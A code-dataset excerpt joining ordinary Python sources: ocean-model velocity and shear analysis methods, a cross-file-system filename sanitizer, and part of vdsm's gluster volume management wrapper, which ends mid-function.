Options:
- t_start = start time, as string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- t_end = end time, as a string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- time_ind = time indices to work in, list of integers
- bot_lvl = index of the bottom level to consider, integer
- top_lvl = index of the top level to consider, integer
- graph = plots graph if True
*Notes*
- use time_ind or t_start and t_end, not both
"""
debug = debug or self._debug
if debug:
print 'Computing vertical shear at point...'
# Find time interval to work in
argtime = []
if not time_ind==[]:
argtime = time_ind
elif not t_start==[]:
if type(t_start)==str:
start = datetime.datetime.strptime(t_start, '%Y-%m-%d %H:%M:%S')
end = datetime.datetime.strptime(t_end, '%Y-%m-%d %H:%M:%S')
argtime = time_to_index(start, end, self._var.julianTime[:], debug=debug)
else:
argtime = np.arange(t_start, t_end)
#Search for the station
index = self.search_index(station)
#Compute depth
dep = self.depth(station, debug=debug)
if not argtime==[]:
depth = dep[argtime,:]
else:
depth = dep
#Sigma levels to consider
if top_lvl==[]:
top_lvl = self._grid.nlevel - 1
if bot_lvl==[]:
bot_lvl = 0
sLvl = range(bot_lvl, top_lvl+1)
#Extracting velocity at point
if not argtime==[]:
U = self._var.u[argtime,:,index]
V = self._var.v[argtime,:,index]
else:
U = self._var.u[:,:,index]
V = self._var.v[:,:,index]
norm = ne.evaluate('sqrt(U**2 + V**2)').squeeze()
# Compute shear
dz = depth[:,sLvl[1:]] - depth[:,sLvl[:-1]]
dvel = norm[:,sLvl[1:]] - norm[:,sLvl[:-1]]
dveldz = dvel / dz
if debug:
print '...Passed'
#Plot mean values
if graph:
mean_depth = np.mean((depth[:,sLvl[1:]]
+ depth[:,sLvl[:-1]]) / 2.0, 0)
mean_dveldz = np.mean(dveldz,0)
error = np.std(dveldz,axis=0)
self._plot.plot_xy(mean_dveldz, mean_depth, xerror=error[:],
title='Shear profile ',
xLabel='Shear (1/s) ', yLabel='Depth (m) ')
return np.squeeze(dveldz)
def velo_norm(self, station, t_start=[], t_end=[], time_ind=[],
graph=True, debug=False):
"""
Compute the velocity norm at any given location
Inputs:
- station = either station index (interger) or name (string)
Outputs:
- velo_norm = velocity norm, 2D array (time, level)
Options:
- t_start = start time, as string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- t_end = end time, as a string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- time_ind = time indices to work in, list of integers
- graph = plots vertical profile averaged over time if True
*Notes*
- use time_ind or t_start and t_end, not both
"""
debug = debug or self._debug
if debug:
print 'Computing velocity norm at point...'
# Find time interval to work in
argtime = []
if not time_ind==[]:
argtime = time_ind
elif not t_start==[]:
if type(t_start)==str:
start = datetime.datetime.strptime(t_start, '%Y-%m-%d %H:%M:%S')
end = datetime.datetime.strptime(t_end, '%Y-%m-%d %H:%M:%S')
argtime = time_to_index(start, end, self._var.julianTime[:], debug=debug)
else:
argtime = np.arange(t_start, t_end)
#Search for the station
index = self.search_index(station)
#Computing velocity norm
try:
if not argtime==[]:
U = self._var.u[argtime, :, index]
V = self._var.v[argtime, :, index]
W = self._var.w[argtime, :, index]
velo_norm = ne.evaluate('sqrt(U**2 + V**2 + W**2)').squeeze()
else:
U = self._var.u[:, :, index]
V = self._var.v[:, :, index]
W = self._var.w[:, :, index]
velo_norm = ne.evaluate('sqrt(U**2 + V**2 + W**2)').squeeze()
except AttributeError:
if not argtime==[]:
U = self._var.u[argtime, :, index]
V = self._var.v[argtime, :, index]
velo_norm = ne.evaluate('sqrt(U**2 + V**2)').squeeze()
else:
U = self._var.u[:, :, index]
V = self._var.v[:, :, index]
velo_norm = ne.evaluate('sqrt(U**2 + V**2)').squeeze()
if debug:
print '...passed'
#Plot mean values
if graph:
depth = np.mean(self.depth(station),axis=0)
vel = np.mean(velo_norm,axis=0)
error = np.std(velo_norm,axis=0)
self._plot.plot_xy(vel, depth, xerror=error[:],
title='Velocity norm profile ',
xLabel='Velocity (m/s) ', yLabel='Depth (m) ')
return velo_norm
def flow_dir(self, station, t_start=[], t_end=[], time_ind=[],
vertical=True, debug=False):
"""
Compute flow directions and associated norm at any given location.
Inputs:
- station = either station index (interger) or name (string)
Outputs:
- flowDir = flowDir at (pt_lon, pt_lat), 2D array (ntime, nlevel)
Options:
- t_start = start time, as string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- t_end = end time, as a string ('yyyy-mm-ddThh:mm:ss'), or time index as an integer
- time_ind = time indices to work in, list of integers
- vertical = True, compute flowDir for each vertical level
*Notes*
- directions between -180 and 180 deg., i.e. 0=East, 90=North,
+/-180=West, -90=South
- use time_ind or t_start and t_end, not both
"""
debug = debug or self._debug
if debug:
print 'Computing flow directions at point...'
#Search for the station
index = self.search_index(station)
# Find time interval to work in
argtime = []
if not time_ind==[]:
argtime = time_ind
elif not t_start==[]:
if type(t_start)==str:
start = datetime.datetime.strptime(t_start, '%Y-%m-%d %H:%M:%S')
end = datetime.datetime.strptime(t_end, '%Y-%m-%d %H:%M:%S')
argtime = time_to_index(start, end, self._var.julianTime[:], debug=debug)
else:
argtime = np.arange(t_start, t_end)
#Choose the right pair of velocity components
if not argtime==[]:
if self._var._3D and vertical:
u = self._var.u[argtime,:,index]
v = self._var.v[argtime,:,index]
else:
u = self._var.ua[argtime,index]
v = self._var.va[argtime,index]
#Compute directions
if debug: print 'Computing arctan2 and norm...'
dirFlow = np.rad2deg(np.arctan2(v,u))
if debug:
print '...Passed'
return np.squeeze(dirFlow)
#TR_comments: templates
# def whatever(self, debug=False):
# if debug or self._debug:
# print 'Start whatever...'
#
# if debug or self._debug:
# print '...Passed'
| agpl-3.0 | -3,323,359,679,726,499,300 | 33.470779 | 96 | 0.509466 | false | 3.817691 | false | false | false |
ksze/sanitize | filename_sanitizer/__init__.py | 1 | 10364 | from __future__ import unicode_literals
import sys
import unicodedata
import warnings
class ReplacementLengthWarning(UserWarning):
pass
warnings.filterwarnings("always", category=ReplacementLengthWarning)
def _are_unicode(unicode_args=[]):
if sys.version_info[0] == 2:
return all((type(arg) == unicode) for arg in unicode_args)
# Assume Python 3
return all((type(arg) == str) for arg in unicode_args)
def sanitize_path_fragment(
original_fragment,
filename_extension = '', # when you do want a filename extension, there is no need to include the leading dot.
target_file_systems = {
'btrfs', 'ext', 'ext2', 'ext3', 'ext3cow', 'ext4', 'exfat', 'fat32',
'hfs+', 'ntfs_win32', 'reiser4', 'reiserfs', 'xfs', 'zfs',
},
sanitization_method = 'underscore',
truncate = True,
replacement = '_',
additional_illegal_characters=[],
):
# Enforce that these args are unicode strings
unicode_args = [original_fragment, filename_extension, replacement] + additional_illegal_characters
if not _are_unicode(unicode_args):
raise ValueError(
'`original_fragment`, `filename_extension`, `replacement`, and `additional_illegal_characters` '
'must be of the unicode type under Python 2 or str type under Python 3.'
)
if len(replacement) > 1:
warnings.warn(
"The replacement is longer than one character. "
"The length of the resulting string cannot be guaranteed to fit the target file systems' length limit.",
ReplacementLengthWarning
)
sanitized_fragment = unicodedata.normalize('NFC', original_fragment)
if len(filename_extension) > 0:
filename_extension = unicodedata.normalize('NFC', '.' + filename_extension)
if sanitization_method == 'underscore':
illegal_characters = {
'btrfs': {'\0', '/'},
'ext': {'\0', '/'},
'ext2': {'\0', '/'},
'ext3': {'\0', '/'},
'ext3cow': {'\0', '/', '@'},
'ext4': {'\0', '/'},
'exfat': {
'\00', '\01', '\02', '\03', '\04', '\05', '\06', '\07', '\10', '\11', '\12', '\13', '\14', '\15', '\16', '\17',
'\20', '\21', '\22', '\23', '\24', '\25', '\26', '\27', '\30', '\31', '\32', '\33', '\34', '\35', '\36', '\37',
'/', '\\', ':', '*', '?', '"', '<', '>', '|',
},
'fat32': { # TODO: Confirm this list; current list is just a wild guess, assuming UTF-16 encoding.
'\00', '\01', '\02', '\03', '\04', '\05', '\06', '\07', '\10', '\11', '\12', '\13', '\14', '\15', '\16', '\17',
'\20', '\21', '\22', '\23', '\24', '\25', '\26', '\27', '\30', '\31', '\32', '\33', '\34', '\35', '\36', '\37',
'/', '\\', ':', '*', '?', '"', '<', '>', '|',
},
# In theory, all Unicode characters, including NUL, are usable in HFS+; so this is just
# a sane set for legacy compatibility - e.g. OS APIs that don't support '/' and ':'.
'hfs+': {'\0', '/', ':'},
'ntfs_win32': {'\0', '/', '\\', ':', '*', '?', '"', '<', '>', '|'}, # NTFS Win32 namespace (stricter)
'ntfs_posix': {'\0', '/'}, # NTFS POSIX namespace (looser)
'reiser4': {'\0', '/'},
'reiserfs': {'\0', '/'},
'xfs': {'\0', '/'},
'zfs': {'\0', '/'},
'additional_illegal_characters': set(additional_illegal_characters),
}
# Replace illegal characters with an underscore
# `target_file_systems` is used further down, so we don't want to pollute it here.
_temp_target_file_systems = set.union(target_file_systems, {'additional_illegal_characters'})
illegal_character_set = set.union(*(illegal_characters[file_system] for file_system in _temp_target_file_systems))
# It would be stupid if the replacement contains an illegal character.
if any(character in replacement for character in illegal_character_set):
raise ValueError('The replacement contains a character that would be illegal in the target file system(s).')
for character in illegal_character_set:
sanitized_fragment = sanitized_fragment.replace(character, replacement)
filename_extension = filename_extension.replace(character, replacement)
# "Quote" illegal filenames
if target_file_systems.intersection({'fat32', 'ntfs_win32'}):
windows_reserved_names = (
"CON", "PRN", "AUX", "NUL",
"COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9",
"LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9",
)
if sanitized_fragment in windows_reserved_names:
sanitized_fragment = replacement + sanitized_fragment + replacement
if filename_extension in windows_reserved_names:
filename_extension = replacement + filename_extension + replacement
# Truncate if the resulting string is too long
if truncate:
max_lengths = {
# For the entries of file systems commonly found with Linux, the length, 'utf-8',
# and 'NFC' are only assumptions that apply to mostly vanilla kernels with default
# build parameters.
# Seriously, this is 2013. The fact that the Linux community does not move to a file
# system with an enforced Unicode filename encoding is as bad as Windows 95's
# codepage madness, some 18 years ago.
# If you add more file systems, see if it is affected by Unicode Normal Forms, like
# HFS+; You may have to take extra care in editing the actual sanitization routine
# below.
'btrfs': (255, 'bytes', 'utf-8', 'NFC'),
'ext': (255, 'bytes', 'utf-8', 'NFC'),
'ext2': (255, 'bytes', 'utf-8', 'NFC'),
'ext3': (255, 'bytes', 'utf-8', 'NFC'),
'ext3cow': (255, 'bytes', 'utf-8', 'NFC'),
'ext4': (255, 'bytes', 'utf-8', 'NFC'),
'exfat': (255, 'characters', 'utf-16', 'NFC'),
# 'utf-16' is not entirely true. FAT32 used to be used with codepages; but since
# Windows XP, the default seems to be UTF-16.
'fat32': (255, 'characters', 'utf-16', 'NFC'),
# FIXME: improve HFS+ handling, because it does not use the standard NFD. It's
# close, but it's not exactly the same thing.
'hfs+': (255, 'characters', 'utf-16', 'NFD'),
'ntfs_win32': (255, 'characters', 'utf-16', 'NFC'),
'ntfs_posix': (255, 'characters', 'utf-16', 'NFC'),
# ReiserFS 3 and 4 support filenames > 255 bytes. I don't care if the vanilla Linux
# kernel can't support that. That's Linux's problem, not mine.
'reiser4': (3976, 'bytes', 'utf-8', 'NFC'),
'reiserfs': (4032, 'bytes', 'utf-8', 'NFC'),
'xfs': (255, 'bytes', 'utf-8', 'NFC'),
'zfs': (255, 'bytes', 'utf-8', 'NFC'),
}
for file_system in target_file_systems:
if max_lengths[file_system][1] == 'bytes':
extension_bytes = unicodedata.normalize(max_lengths[file_system][3], filename_extension).encode(max_lengths[file_system][2])
temp_fragment = bytearray()
for character in sanitized_fragment:
encoded_bytes = unicodedata.normalize(max_lengths[file_system][3], character).encode(max_lengths[file_system][2])
if len(temp_fragment) + len(encoded_bytes) + len(extension_bytes)<= max_lengths[file_system][0]:
temp_fragment = temp_fragment + encoded_bytes
else:
break
sanitized_fragment = unicodedata.normalize('NFC', temp_fragment.decode(max_lengths[file_system][2]))
else: # Assume 'characters'
temp_fragment = ''
if file_system == 'hfs+':
normalize = unicodedata.ucd_3_2_0.normalize
else:
normalize = unicodedata.normalize
normalized_extension = normalize(max_lengths[file_system][3], filename_extension)
for character in sanitized_fragment:
normalized_character = normalize(max_lengths[file_system][3], character)
if len(temp_fragment) + len(normalized_character) + len(normalized_extension) <= max_lengths[file_system][0]:
temp_fragment += normalized_character
else:
break
sanitized_fragment = unicodedata.normalize('NFC', temp_fragment)
sanitized_fragment = sanitized_fragment + filename_extension
# Disallow a final dot or space for FAT32 and NTFS in Win32 namespace.
# This can only be done after truncations because otherwise we may fix the fragment, but
# still end up with a bad ending character once it's truncated
if (
target_file_systems.intersection({'fat32', 'ntfs_win32'}) and
(sanitized_fragment.endswith('.') or sanitized_fragment.endswith(' '))
):
if replacement.endswith('.') or replacement.endswith(' '):
raise ValueError(
'The sanitized string ends with a dot or space, and the replacement also ends with a dot or space. '
'Therefore the string cannot be sanitized for fat32 or ntfs_win32.'
)
while (sanitized_fragment.endswith('.') or sanitized_fragment.endswith(' ')):
sanitized_fragment = sanitized_fragment[:-1] + replacement
else:
raise ValueError("sanitization_method must be a valid sanitization method.")
return sanitized_fragment
| bsd-2-clause | 5,655,083,877,428,334,000 | 48.118483 | 144 | 0.531648 | false | 4.135674 | false | false | false |
EdDev/vdsm | lib/vdsm/gluster/cli.py | 1 | 60687 | #
# Copyright 2012-2017 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Refer to the README and COPYING files for full details of the license
#
from __future__ import absolute_import
import calendar
import logging
import os
import socket
import time
import xml.etree.cElementTree as etree
from vdsm.common import cmdutils
from vdsm import commands
from vdsm.gluster import exception as ge
from vdsm.network.netinfo import addresses
from . import gluster_mgmt_api, gluster_api
_glusterCommandPath = cmdutils.CommandPath("gluster",
"/usr/sbin/gluster",
)
_TIME_ZONE = time.tzname[0]
if hasattr(etree, 'ParseError'):
_etreeExceptions = (etree.ParseError, AttributeError, ValueError)
else:
_etreeExceptions = (SyntaxError, AttributeError, ValueError)
def _getGlusterVolCmd():
return [_glusterCommandPath.cmd, "--mode=script", "volume"]
def _getGlusterPeerCmd():
return [_glusterCommandPath.cmd, "--mode=script", "peer"]
def _getGlusterSystemCmd():
return [_glusterCommandPath.cmd, "system::"]
def _getGlusterVolGeoRepCmd():
return _getGlusterVolCmd() + ["geo-replication"]
def _getGlusterSnapshotCmd():
return [_glusterCommandPath.cmd, "--mode=script", "snapshot"]
class BrickStatus:
PAUSED = 'PAUSED'
COMPLETED = 'COMPLETED'
RUNNING = 'RUNNING'
UNKNOWN = 'UNKNOWN'
NA = 'NA'
class HostStatus:
CONNECTED = 'CONNECTED'
DISCONNECTED = 'DISCONNECTED'
UNKNOWN = 'UNKNOWN'
class VolumeStatus:
ONLINE = 'ONLINE'
OFFLINE = 'OFFLINE'
class TransportType:
TCP = 'TCP'
RDMA = 'RDMA'
class TaskType:
REBALANCE = 'REBALANCE'
REPLACE_BRICK = 'REPLACE_BRICK'
REMOVE_BRICK = 'REMOVE_BRICK'
class SnapshotStatus:
ACTIVATED = 'ACTIVATED'
DEACTIVATED = 'DEACTIVATED'
def _execGluster(cmd):
return commands.execCmd(cmd)
def _execGlusterXml(cmd):
cmd.append('--xml')
rc, out, err = commands.execCmd(cmd)
if rc != 0:
raise ge.GlusterCmdExecFailedException(rc, out, err)
try:
tree = etree.fromstring('\n'.join(out))
rv = int(tree.find('opRet').text)
msg = tree.find('opErrstr').text
errNo = int(tree.find('opErrno').text)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=out)
if rv == 0:
return tree
else:
if errNo != 0:
rv = errNo
raise ge.GlusterCmdFailedException(rc=rv, err=[msg])
def _getLocalIpAddress():
for ip in addresses.getIpAddresses():
if not ip.startswith('127.'):
return ip
return ''
def _getGlusterHostName():
try:
return socket.getfqdn()
except socket.herror:
logging.exception('getfqdn')
return ''
@gluster_mgmt_api
def hostUUIDGet():
command = _getGlusterSystemCmd() + ["uuid", "get"]
rc, out, err = _execGluster(command)
if rc == 0:
for line in out:
if line.startswith('UUID: '):
return line[6:]
raise ge.GlusterHostUUIDNotFoundException()
def _parseVolumeStatus(tree):
status = {'name': tree.find('volStatus/volumes/volume/volName').text,
'bricks': [],
'nfs': [],
'shd': []}
hostname = _getLocalIpAddress() or _getGlusterHostName()
for el in tree.findall('volStatus/volumes/volume/node'):
value = {}
for ch in el.getchildren():
value[ch.tag] = ch.text or ''
ports = {}
for ch in el.find('ports').getchildren():
ports[ch.tag] = ch.text or ''
if value['path'] == 'localhost':
value['path'] = hostname
if value['status'] == '1':
value['status'] = 'ONLINE'
else:
value['status'] = 'OFFLINE'
if value['hostname'] == 'NFS Server':
status['nfs'].append({'hostname': value['path'],
'hostuuid': value['peerid'],
'port': ports['tcp'],
'rdma_port': ports['rdma'],
'status': value['status'],
'pid': value['pid']})
elif value['hostname'] == 'Self-heal Daemon':
status['shd'].append({'hostname': value['path'],
'hostuuid': value['peerid'],
'status': value['status'],
'pid': value['pid']})
else:
status['bricks'].append({'brick': '%s:%s' % (value['hostname'],
value['path']),
'hostuuid': value['peerid'],
'port': ports['tcp'],
'rdma_port': ports['rdma'],
'status': value['status'],
'pid': value['pid']})
return status
def _parseVolumeStatusDetail(tree):
status = {'name': tree.find('volStatus/volumes/volume/volName').text,
'bricks': []}
for el in tree.findall('volStatus/volumes/volume/node'):
value = {}
for ch in el.getchildren():
value[ch.tag] = ch.text or ''
sizeTotal = int(value['sizeTotal'])
value['sizeTotal'] = sizeTotal / (1024.0 * 1024.0)
sizeFree = int(value['sizeFree'])
value['sizeFree'] = sizeFree / (1024.0 * 1024.0)
status['bricks'].append({'brick': '%s:%s' % (value['hostname'],
value['path']),
'hostuuid': value['peerid'],
'sizeTotal': '%.3f' % (value['sizeTotal'],),
'sizeFree': '%.3f' % (value['sizeFree'],),
'device': value['device'],
'blockSize': value['blockSize'],
'mntOptions': value['mntOptions'],
'fsName': value['fsName']})
return status
def _parseVolumeStatusClients(tree):
status = {'name': tree.find('volStatus/volumes/volume/volName').text,
'bricks': []}
for el in tree.findall('volStatus/volumes/volume/node'):
hostname = el.find('hostname').text
path = el.find('path').text
hostuuid = el.find('peerid').text
clientsStatus = []
for c in el.findall('clientsStatus/client'):
clientValue = {}
for ch in c.getchildren():
clientValue[ch.tag] = ch.text or ''
clientsStatus.append({'hostname': clientValue['hostname'],
'bytesRead': clientValue['bytesRead'],
'bytesWrite': clientValue['bytesWrite']})
status['bricks'].append({'brick': '%s:%s' % (hostname, path),
'hostuuid': hostuuid,
'clientsStatus': clientsStatus})
return status
def _parseVolumeStatusMem(tree):
status = {'name': tree.find('volStatus/volumes/volume/volName').text,
'bricks': []}
for el in tree.findall('volStatus/volumes/volume/node'):
brick = {'brick': '%s:%s' % (el.find('hostname').text,
el.find('path').text),
'hostuuid': el.find('peerid').text,
'mallinfo': {},
'mempool': []}
for ch in el.find('memStatus/mallinfo').getchildren():
brick['mallinfo'][ch.tag] = ch.text or ''
for c in el.findall('memStatus/mempool/pool'):
mempool = {}
for ch in c.getchildren():
mempool[ch.tag] = ch.text or ''
brick['mempool'].append(mempool)
status['bricks'].append(brick)
return status
@gluster_mgmt_api
def volumeStatus(volumeName, brick=None, option=None):
"""
Get volume status
Arguments:
* VolumeName
* brick
* option = 'detail' or 'clients' or 'mem' or None
Returns:
When option=None,
{'name': NAME,
'bricks': [{'brick': BRICK,
'hostuuid': UUID,
'port': PORT,
'rdma_port': RDMA_PORT,
'status': STATUS,
'pid': PID}, ...],
'nfs': [{'hostname': HOST,
'hostuuid': UUID,
'port': PORT,
'rdma_port': RDMA_PORT,
'status': STATUS,
'pid': PID}, ...],
'shd: [{'hostname': HOST,
'hostuuid': UUID,
'status': STATUS,
'pid': PID}, ...]}
When option='detail',
{'name': NAME,
'bricks': [{'brick': BRICK,
'hostuuid': UUID,
'sizeTotal': SIZE,
'sizeFree': FREESIZE,
'device': DEVICE,
'blockSize': BLOCKSIZE,
'mntOptions': MOUNTOPTIONS,
'fsName': FSTYPE}, ...]}
When option='clients':
{'name': NAME,
'bricks': [{'brick': BRICK,
'hostuuid': UUID,
'clientsStatus': [{'hostname': HOST,
'bytesRead': BYTESREAD,
'bytesWrite': BYTESWRITE}, ...]},
...]}
When option='mem':
{'name': NAME,
'bricks': [{'brick': BRICK,
'hostuuid': UUID,
'mallinfo': {'arena': int,
'fordblks': int,
'fsmblks': int,
'hblkhd': int,
'hblks': int,
'keepcost': int,
'ordblks': int,
'smblks': int,
'uordblks': int,
'usmblks': int},
'mempool': [{'allocCount': int,
'coldCount': int,
'hotCount': int,
'maxAlloc': int,
'maxStdAlloc': int,
'name': NAME,
'padddedSizeOf': int,
'poolMisses': int},...]}, ...]}
"""
command = _getGlusterVolCmd() + ["status", volumeName]
if brick:
command.append(brick)
if option:
command.append(option)
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeStatusFailedException(rc=e.rc, err=e.err)
try:
if option == 'detail':
return _parseVolumeStatusDetail(xmltree)
elif option == 'clients':
return _parseVolumeStatusClients(xmltree)
elif option == 'mem':
return _parseVolumeStatusMem(xmltree)
else:
return _parseVolumeStatus(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseVolumeInfo(tree):
"""
{VOLUMENAME: {'brickCount': BRICKCOUNT,
'bricks': [BRICK1, BRICK2, ...],
'options': {OPTION: VALUE, ...},
'transportType': [TCP,RDMA, ...],
'uuid': UUID,
'volumeName': NAME,
'volumeStatus': STATUS,
'volumeType': TYPE,
'disperseCount': DISPERSE_COUNT,
'redundancyCount': REDUNDANCY_COUNT,
'isArbiter': [True/False]}, ...}
"""
volumes = {}
for el in tree.findall('volInfo/volumes/volume'):
value = {}
value['volumeName'] = el.find('name').text
value['uuid'] = el.find('id').text
value['volumeType'] = el.find('typeStr').text.upper().replace('-', '_')
status = el.find('statusStr').text.upper()
if status == 'STARTED':
value["volumeStatus"] = VolumeStatus.ONLINE
else:
value["volumeStatus"] = VolumeStatus.OFFLINE
value['brickCount'] = el.find('brickCount').text
value['distCount'] = el.find('distCount').text
value['stripeCount'] = el.find('stripeCount').text
value['replicaCount'] = el.find('replicaCount').text
value['disperseCount'] = el.find('disperseCount').text
value['redundancyCount'] = el.find('redundancyCount').text
value['isArbiter'] = (el.find('arbiterCount').text == '1')
transportType = el.find('transport').text
if transportType == '0':
value['transportType'] = [TransportType.TCP]
elif transportType == '1':
value['transportType'] = [TransportType.RDMA]
else:
value['transportType'] = [TransportType.TCP, TransportType.RDMA]
value['bricks'] = []
value['options'] = {}
value['bricksInfo'] = []
for b in el.findall('bricks/brick'):
value['bricks'].append(b.text)
for o in el.findall('options/option'):
value['options'][o.find('name').text] = o.find('value').text
for d in el.findall('bricks/brick'):
brickDetail = {}
# this try block is to maintain backward compatibility
# it returns an empty list when gluster doesnot return uuid
try:
brickDetail['name'] = d.find('name').text
brickDetail['hostUuid'] = d.find('hostUuid').text
brickDetail['isArbiter'] = (d.find('isArbiter').text == '1')
value['bricksInfo'].append(brickDetail)
except AttributeError:
break
volumes[value['volumeName']] = value
return volumes
def _parseVolumeProfileInfo(tree, nfs):
bricks = []
if nfs:
brickKey = 'nfs'
bricksKey = 'nfsServers'
else:
brickKey = 'brick'
bricksKey = 'bricks'
for brick in tree.findall('volProfile/brick'):
fopCumulative = []
blkCumulative = []
fopInterval = []
blkInterval = []
brickName = brick.find('brickName').text
if brickName == 'localhost':
brickName = _getLocalIpAddress() or _getGlusterHostName()
for block in brick.findall('cumulativeStats/blockStats/block'):
blkCumulative.append({'size': block.find('size').text,
'read': block.find('reads').text,
'write': block.find('writes').text})
for fop in brick.findall('cumulativeStats/fopStats/fop'):
fopCumulative.append({'name': fop.find('name').text,
'hits': fop.find('hits').text,
'latencyAvg': fop.find('avgLatency').text,
'latencyMin': fop.find('minLatency').text,
'latencyMax': fop.find('maxLatency').text})
for block in brick.findall('intervalStats/blockStats/block'):
blkInterval.append({'size': block.find('size').text,
'read': block.find('reads').text,
'write': block.find('writes').text})
for fop in brick.findall('intervalStats/fopStats/fop'):
fopInterval.append({'name': fop.find('name').text,
'hits': fop.find('hits').text,
'latencyAvg': fop.find('avgLatency').text,
'latencyMin': fop.find('minLatency').text,
'latencyMax': fop.find('maxLatency').text})
bricks.append(
{brickKey: brickName,
'cumulativeStats': {
'blockStats': blkCumulative,
'fopStats': fopCumulative,
'duration': brick.find('cumulativeStats/duration').text,
'totalRead': brick.find('cumulativeStats/totalRead').text,
'totalWrite': brick.find('cumulativeStats/totalWrite').text},
'intervalStats': {
'blockStats': blkInterval,
'fopStats': fopInterval,
'duration': brick.find('intervalStats/duration').text,
'totalRead': brick.find('intervalStats/totalRead').text,
'totalWrite': brick.find('intervalStats/totalWrite').text}})
status = {'volumeName': tree.find("volProfile/volname").text,
bricksKey: bricks}
return status
@gluster_api
@gluster_mgmt_api
def volumeInfo(volumeName=None, remoteServer=None):
"""
Returns:
{VOLUMENAME: {'brickCount': BRICKCOUNT,
'bricks': [BRICK1, BRICK2, ...],
'options': {OPTION: VALUE, ...},
'transportType': [TCP,RDMA, ...],
'uuid': UUID,
'volumeName': NAME,
'volumeStatus': STATUS,
'volumeType': TYPE}, ...}
"""
command = _getGlusterVolCmd() + ["info"]
if remoteServer:
command += ['--remote-host=%s' % remoteServer]
if volumeName:
command.append(volumeName)
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumesListFailedException(rc=e.rc, err=e.err)
try:
return _parseVolumeInfo(xmltree)
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeCreate(volumeName, brickList, replicaCount=0, stripeCount=0,
transportList=[], force=False, arbiter=False):
command = _getGlusterVolCmd() + ["create", volumeName]
if stripeCount:
command += ["stripe", "%s" % stripeCount]
if replicaCount:
command += ["replica", "%s" % replicaCount]
if arbiter:
command += ["arbiter", "1"]
if transportList:
command += ["transport", ','.join(transportList)]
command += brickList
if force:
command.append('force')
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeCreateFailedException(rc=e.rc, err=e.err)
try:
return {'uuid': xmltree.find('volCreate/volume/id').text}
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeStart(volumeName, force=False):
command = _getGlusterVolCmd() + ["start", volumeName]
if force:
command.append('force')
rc, out, err = _execGluster(command)
if rc:
raise ge.GlusterVolumeStartFailedException(rc, out, err)
else:
return True
@gluster_mgmt_api
def volumeStop(volumeName, force=False):
command = _getGlusterVolCmd() + ["stop", volumeName]
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeStopFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeDelete(volumeName):
command = _getGlusterVolCmd() + ["delete", volumeName]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeDeleteFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeSet(volumeName, option, value):
command = _getGlusterVolCmd() + ["set", volumeName, option, value]
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeSetFailedException(rc=e.rc, err=e.err)
def _parseVolumeSetHelpXml(out):
optionList = []
tree = etree.fromstring('\n'.join(out))
for el in tree.findall('option'):
option = {}
for ch in el.getchildren():
option[ch.tag] = ch.text or ''
optionList.append(option)
return optionList
@gluster_mgmt_api
def volumeSetHelpXml():
rc, out, err = _execGluster(_getGlusterVolCmd() + ["set", 'help-xml'])
if rc:
raise ge.GlusterVolumeSetHelpXmlFailedException(rc, out, err)
else:
return _parseVolumeSetHelpXml(out)
@gluster_mgmt_api
def volumeReset(volumeName, option='', force=False):
command = _getGlusterVolCmd() + ['reset', volumeName]
if option:
command.append(option)
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeResetFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeAddBrick(volumeName, brickList,
replicaCount=0, stripeCount=0, force=False):
command = _getGlusterVolCmd() + ["add-brick", volumeName]
if stripeCount:
command += ["stripe", "%s" % stripeCount]
if replicaCount:
command += ["replica", "%s" % replicaCount]
command += brickList
if force:
command.append('force')
try:
_execGlusterXml(command)
return True
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeBrickAddFailedException(rc=e.rc, err=e.err)
@gluster_mgmt_api
def volumeRebalanceStart(volumeName, rebalanceType="", force=False):
command = _getGlusterVolCmd() + ["rebalance", volumeName]
if rebalanceType:
command.append(rebalanceType)
command.append("start")
if force:
command.append("force")
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
raise ge.GlusterVolumeRebalanceStartFailedException(rc=e.rc,
err=e.err)
try:
return {'taskId': xmltree.find('volRebalance/task-id').text}
except _etreeExceptions:
raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeRebalanceStop(volumeName, force=False):
command = _getGlusterVolCmd() + ["rebalance", volumeName, "stop"]
if force:
command.append('force')
try:
xmltree = _execGlusterXml(command)
except ge.GlusterCmdFailedException as e:
